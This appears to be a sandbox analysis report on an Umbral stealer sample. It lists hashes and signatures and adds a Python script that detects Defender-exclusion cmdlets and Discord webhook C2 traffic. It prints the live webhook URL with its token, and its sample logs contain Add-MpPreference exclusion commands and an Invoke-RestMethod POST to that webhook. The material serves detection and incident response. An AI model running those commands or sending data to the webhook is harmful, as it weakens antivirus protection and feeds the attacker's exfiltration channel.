General

Target: 5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84.zip
Size: 92KB
Sample: 240612-2x7mvaxgnk
MD5: c561219802d64420e3eb701d17533337
SHA1: 7a41248380246af450c3967c02cb313fdddc3049
SHA256: 5a72cef1aee6243c81a9ec709be05ef1d443f1431ba635392e88fe761708ed42
SHA512: 78d5f6323e535e4b683fe8de990d013f187e712fc095b1327438d51ba8be1c7d8603ad04e269504907fbba129aa84410d3c7b80d22b088d2367cab9e91a80b7e
SSDEEP: 1536:Dwa/5M3IBpELnvaRh9l+GxGwYJmaQJbn15fX2NsG5pBjZDa21Li:USM3QevaNl+GUDYbrOOG5pVZLLi

Note that the submitted archive is named after the SHA256 of the executable it contains; the hashes above are those of the zip itself, and the hashes of the extracted executable are listed under Targets.
Behavioral task

Task: behavioral1
Sample: 5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84.exe
Resource: win7-20240508-en
Malware Config

Extracted family: umbral
C2 (Discord webhook): https://discord.com/api/webhooks/1248607651387146310/L22eWHFIaqQanWIJXuwKJbdlgO8LfAMUL1ag9JLuvBFDDekhSwD3f38KvJADfkAUnTsK

The webhook URL is the stealer's exfiltration channel: stolen data is POSTed to it and lands in a Discord channel the operator controls. Treat the URL as an indicator to block and report (the numeric segment is the webhook ID, the trailing segment its token); do not open it from an analysis host, since any request reaches the attacker's infrastructure.
Targets

Target: 5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84.exe
Size: 229KB
MD5: 1adeea63d576dea9add98e01e9fe78b4
SHA1: 8f754fd661d9ce2e9e9a7278b4dd7096b13fc585
SHA256: 5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84
SHA512: 0ba3c5555273a15c5406f0bd1b5f1a3888814bdbb4130f80eae1f973497c4e5d81a92ed0797a55316b358a42a955fe44f476d1e0e90c15211dc30f4dd20c58cb
SSDEEP: 6144:lloZMCrIkd8g+EtXHkv/iD4sodaBPUonIWvRsY99ib8e1miLZi:noZZL+EP8sodaBPUonIWvRsY9wfLA
Signatures

Detect Umbral payload
The sample matches the Umbral stealer family signature, consistent with the extracted configuration above.

Command and Scripting Interpreter: PowerShell
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes so that the payload and the locations it writes to are no longer scanned. On a live host this shows up as Add-MpPreference or Set-MpPreference with -ExclusionPath, -ExclusionExtension or -ExclusionProcess in PowerShell script block logging (Event ID 4104) or process creation logs, and the resulting exclusions are visible with Get-MpPreference.

Legitimate hosting services abused for malware hosting/C2
The Discord webhook in the configuration is the abused service here: traffic to discord.com blends in with normal use, so the webhook URL, not the domain, is the useful indicator.

Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP, typically so it can be included in the exfiltrated report.
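The two behaviours above that leave the clearest trail on an endpoint, the Defender exclusion cmdlets and the Discord webhook C2, are easy to hunt for in collected PowerShell command lines and script blocks. The following is an added detection example written for this page; it is not part of the sandbox report or of the sample. The log lines in SAMPLE_LOGS are constructed for illustration (only the webhook URL is taken from the extracted configuration), and the rule names are arbitrary. It distinguishes the write cmdlets (Add-/Set-MpPreference) from the read-only Get-MpPreference so that an administrator auditing exclusions does not trigger the rule, and it defangs any webhook it finds so the output can be pasted into a ticket safely.

```python
import re

# Constructed sample lines in the shape of PowerShell script block / process
# command line telemetry. These are made up for this example, except the
# webhook URL, which is the one extracted from the sample's configuration.
SAMPLE_LOGS = [
    'powershell.exe -NoProfile -Command Add-MpPreference -ExclusionPath "C:\\Users\\victim\\AppData\\Local\\Temp"',
    'powershell.exe Add-MpPreference -ExclusionExtension ".exe" -ExclusionProcess "svchost.exe"',
    'powershell.exe -Command Get-MpPreference | Select-Object ExclusionPath,ExclusionProcess',
    'Invoke-RestMethod -Uri "https://discord.com/api/webhooks/1248607651387146310/'
    'L22eWHFIaqQanWIJXuwKJbdlgO8LfAMUL1ag9JLuvBFDDekhSwD3f38KvJADfkAUnTsK" -Method Post',
]

# Only the cmdlets that change Defender preferences are interesting; Get-MpPreference
# is what a defender runs to audit exclusions and must not fire the rule.
MP_WRITE_CMDLET_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)

# Exclusion parameters an attacker uses to carve the payload out of scanning.
EXCLUSION_PARAMS = ("-ExclusionPath", "-ExclusionExtension", "-ExclusionProcess")

# Discord webhook: numeric webhook ID followed by an opaque token.
DISCORD_WEBHOOK_RE = re.compile(
    r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_\-]+)",
    re.IGNORECASE,
)


def defender_exclusion_hits(line):
    """Return the exclusion parameters used with Add-/Set-MpPreference in a line."""
    if not MP_WRITE_CMDLET_RE.search(line):
        return []
    low = line.lower()
    return [p for p in EXCLUSION_PARAMS if p.lower() in low]


def discord_webhooks(line):
    """Return (webhook_id, token, full_url) tuples for every Discord webhook in a line."""
    return [(m.group(1), m.group(2), m.group(0)) for m in DISCORD_WEBHOOK_RE.finditer(line)]


def defang(url):
    """Rewrite a URL so it cannot be clicked by accident in a report."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}{slash}{path}"


def triage(lines):
    """Run both rules over a list of log lines and return structured findings."""
    findings = []
    for idx, line in enumerate(lines):
        params = defender_exclusion_hits(line)
        if params:
            findings.append({"line": idx, "rule": "defender_exclusion", "detail": params})
        for webhook_id, _token, url in discord_webhooks(line):
            findings.append({"line": idx, "rule": "discord_webhook",
                             "detail": [webhook_id, defang(url)]})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOGS):
        print(finding)
```

The webhook token is deliberately not included in the finding: the ID is enough to correlate across hosts and to report the webhook, and keeping the token out of tickets avoids giving every reader the ability to post to the attacker's channel.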